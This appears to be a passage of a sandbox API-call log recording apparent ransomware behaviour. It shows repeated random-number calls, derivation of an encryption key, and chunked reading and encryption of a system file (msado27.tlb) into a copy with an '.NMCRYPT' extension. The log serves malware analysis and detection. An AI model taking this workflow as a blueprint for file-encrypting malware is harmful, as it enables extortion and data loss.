CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.549] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0167.549] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0167.550] CryptCreateHash (in: hProv=0x8e3000, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444824 | out: phHash=0x1d444824) returned 1 [0167.550] CryptHashData (hHash=0x9ad338, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.550] CryptDeriveKey (in: hProv=0x8e3000, Algid=0x6610, hBaseData=0x9ad338, dwFlags=0x4, phKey=0x1d444828 | out: phKey=0x1d444828*=0x9ad7b8) returned 1 [0167.550] CryptSetKeyParam (hKey=0x9ad7b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0167.550] CryptSetKeyParam (hKey=0x9ad7b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0167.550] wcslen (_String="\\\\?\\") returned 0x4 [0167.550] CryptDuplicateKey (in: hKey=0x9ad7b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad678) returned 1 [0167.550] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb.NMCRYPT" (normalized: "c:\\program files\\common files\\system\\ado\\msado27.tlb.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0167.550] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado27.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0167.551] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=71680) returned 1 [0167.551] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0167.551] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.552] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.552] GetLastError () returned 0x0 [0167.552] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.553] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.553] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.554] GetLastError () returned 0x0 [0167.554] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.554] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.554] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.554] GetLastError () returned 0x0 [0167.554] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.554] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.554] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.554] GetLastError () returned 0x0 [0167.554] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.554] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.554] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.554] GetLastError () returned 0x0 [0167.554] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.554] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.554] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.554] GetLastError () returned 0x0 [0167.554] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.554] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.555] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.555] GetLastError () returned 0x0 [0167.555] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.555] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.555] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.555] GetLastError () returned 0x0 [0167.555] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.555] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.555] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.555] GetLastError () returned 0x0 [0167.555] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.555] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.555] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.555] GetLastError () returned 0x0 [0167.555] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.555] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.555] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.555] GetLastError () returned 0x0 [0167.555] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.555] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 